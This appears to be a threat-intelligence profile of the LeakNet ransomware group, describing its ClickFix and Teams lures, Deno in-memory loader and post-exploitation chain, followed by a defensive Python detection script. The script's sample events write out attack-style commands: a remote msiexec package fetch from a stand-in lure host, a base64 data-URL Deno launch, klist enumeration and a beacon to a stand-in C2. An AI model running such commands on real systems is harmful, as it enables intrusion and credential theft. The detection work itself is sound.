LeakNet
LeakNet is an emerging ransomware operator first observed in late 2024. Reporting cited in the content attributes several recent incidents to LeakNet with high confidence, based on overlapping infrastructure and consistent TTPs. The group was described as averaging about three victims per month, but it is scaling up and shifting from reliance on initial access brokers toward self-directed access operations.

Observed initial access includes ClickFix social engineering delivered through compromised legitimate websites, including fake Cloudflare Turnstile verification pages that trick users into manually running malicious msiexec commands that download and execute a loader. The campaign was described as opportunistic rather than narrowly targeted. A separate intrusion attempt using Microsoft Teams phishing led to a similar Deno-based loader, but attribution for that specific case was noted as inconclusive.

A notable capability associated with LeakNet is a previously unreported Deno-based in-memory loader. The group uses a bring-your-own-runtime approach: it installs the legitimate Deno executable and executes base64-encoded JavaScript from a data URL largely in memory, reducing disk artifacts. In observed activity, execution was initiated through VBS and PowerShell scripts named Juliet*.vbs and Romeo*.ps1. The loader fingerprints the host by collecting data such as username, hostname, total memory, and OS release; generates a victim identifier; checks in to attacker-controlled infrastructure to obtain a victim-specific second stage; attempts to bind to a local port to avoid duplicate execution; and then enters a polling loop to repeatedly fetch and execute additional code.

Across confirmed incidents, LeakNet used a consistent post-exploitation chain. This included DLL sideloading by placing a malicious jli.dll next to a legitimate Java process in C:\ProgramData\USOShared, running cmd.exe /c klist to enumerate active authentication credentials, using PsExec for lateral movement, and staging payloads or supporting exfiltration through Amazon S3 buckets and other trusted cloud services. Beaconing was observed to multiple domains with a similar URL structure ending in /intake/organizations/events?channel=app.

The content maps LeakNet activity to MITRE ATT&CK techniques including T1189, T1204.004, T1059.007, T1218.007, T1574.001, T1620, T1021.002, T1071.001, and T1102.002. No nation-state affiliation or additional aliases/sub-groups beyond LeakNet are provided in the content.
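The behaviours above translate directly into host and network detections. The following is an added example, not code from the page or from any vendor cited on it: a small rule set run over constructed EDR-style process, image-load and network events. The event field names (type, image, cmdline, module, url), the paths and the hostnames are assumptions chosen for the example; the patterns themselves (msiexec with a remote package, Juliet*/Romeo* script names, deno.exe launched with a base64 data: URL, cmd.exe /c klist, jli.dll loaded from C:\ProgramData\USOShared, and the /intake/organizations/events?channel=app beacon path) come from the description above. Technique IDs are attached only where the page's ATT&CK list makes the pairing unambiguous.

```python
"""Detection rules for the LeakNet tradecraft described above, run over
constructed sample telemetry. Field names are assumed, not a vendor schema."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Callable, Iterable

# Constructed sample events (not from the report). Hosts use .invalid and the
# base64 blob is just console.log(1), so nothing here is a real indicator.
SAMPLE_EVENTS: list[dict] = [
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /i https://lure.example.invalid/verify.msi /qn"},
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Public\Juliet8842.vbs"},
    {"type": "process", "image": r"C:\Users\Public\deno\deno.exe",
     "cmdline": "deno.exe run -A data:application/javascript;base64,Y29uc29sZS5sb2coMSk="},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c klist"},
    {"type": "imageload", "image": r"C:\ProgramData\USOShared\java.exe",
     "module": r"C:\ProgramData\USOShared\jli.dll"},
    {"type": "network", "image": r"C:\Users\Public\deno\deno.exe",
     "url": "https://c2.example.invalid/intake/organizations/events?channel=app"},
    # Benign look-alikes that must not fire: a developer's Deno server, the
    # JDK's own jli.dll, and a local MSI install.
    {"type": "process", "image": r"C:\Program Files\deno\deno.exe",
     "cmdline": "deno.exe run --allow-net server.ts"},
    {"type": "imageload", "image": r"C:\Program Files\Java\jdk-21\bin\java.exe",
     "module": r"C:\Program Files\Java\jdk-21\bin\jli.dll"},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\Public\Downloads\tool.msi /qn"},
]


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str
    event: dict


def _base(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def remote_msiexec(ev: dict) -> bool:
    """msiexec pulling its package from a URL, as in the ClickFix lure."""
    return (ev["type"] == "process" and _base(ev["image"]) == "msiexec.exe"
            and re.search(r"https?://", ev["cmdline"], re.I) is not None)


def named_stager_script(ev: dict) -> bool:
    """Script names matching the reported Juliet*.vbs / Romeo*.ps1 pattern."""
    return (ev["type"] == "process" and re.search(
        r"\\(juliet|romeo)[^\\]*\.(vbs|ps1)\b", ev["cmdline"], re.I) is not None)


def deno_data_url(ev: dict) -> bool:
    """deno.exe executing base64 JavaScript from a data: URL (in-memory loader)."""
    return (ev["type"] == "process" and _base(ev["image"]) == "deno.exe"
            and re.search(r"\bdata:[^\s]*;base64,", ev["cmdline"], re.I) is not None)


def klist_via_cmd(ev: dict) -> bool:
    """cmd.exe /c klist: Kerberos ticket enumeration."""
    return (ev["type"] == "process" and _base(ev["image"]) == "cmd.exe"
            and re.search(r"/c\s+klist\b", ev["cmdline"], re.I) is not None)


def jli_sideload(ev: dict) -> bool:
    """jli.dll loaded from ProgramData\\USOShared rather than a JDK/JRE install."""
    return (ev["type"] == "imageload" and _base(ev["module"]) == "jli.dll"
            and "\\programdata\\usoshared\\" in ev["module"].lower())


def intake_beacon(ev: dict) -> bool:
    """Beacon URL structure reported across multiple LeakNet domains."""
    return (ev["type"] == "network"
            and ev["url"].lower().endswith("/intake/organizations/events?channel=app"))


RULES: list[tuple[str, str, Callable[[dict], bool]]] = [
    ("msiexec_remote_package", "T1218.007", remote_msiexec),
    ("juliet_romeo_stager", "n/a (naming pattern from the report)", named_stager_script),
    ("deno_data_url_js", "T1059.007 / T1620", deno_data_url),
    ("klist_via_cmd", "n/a (credential enumeration)", klist_via_cmd),
    ("jli_sideload_usoshared", "T1574.001", jli_sideload),
    ("intake_events_beacon", "T1071.001", intake_beacon),
]


def scan(events: Iterable[dict]) -> list[Finding]:
    """Apply every rule to every event and return the matches in event order."""
    return [Finding(name, tech, ev) for ev in events
            for name, tech, pred in RULES if pred(ev)]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:24} {f.technique:32} {f.event.get('cmdline') or f.event.get('module') or f.event.get('url')}")
```

The benign events at the end of the sample are the part worth keeping when adapting this: deno.exe and jli.dll are both legitimate, so the rules key on the data: URL argument and the USOShared path rather than on the file names alone, and the beacon rule keys on the URL path because the domains vary across incidents.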
Tradecraft: 24 distinct techniques observed across reporting, grouped by tactic.
Observables: 21 indicators attributed to this actor (domains, IPs, hashes, and other artifacts pulled from reporting).
Recent activity: 3 sources tracked across advisories, community write-ups, and news.
Emerging ransomware operator using compromised legitimate websites for ClickFix lures, Teams-based phishing, and a Deno-based in-memory loader to gain access and execute payloads. Post-compromise activity includes DLL sideloading, C2 beaconing, Kerberos credential enumeration, lateral movement with PsExec, and exfiltration via AWS S3 buckets.
LeakNet is scaling its ransomware operations by shifting from reliance on initial access brokers to broader victim acquisition via ClickFix social engineering and Microsoft Teams phishing, then using a consistent post-exploitation chain featuring a stealthy Deno-based in-memory loader.
Ransomware operator expanding initial access from IAB-sourced access and compromised edge devices to self-directed ClickFix campaigns on compromised legitimate websites, using a Deno-based in-memory loader, then following a consistent post-exploitation chain of jli.dll side-loading, PsExec lateral movement, and S3 bucket payload staging.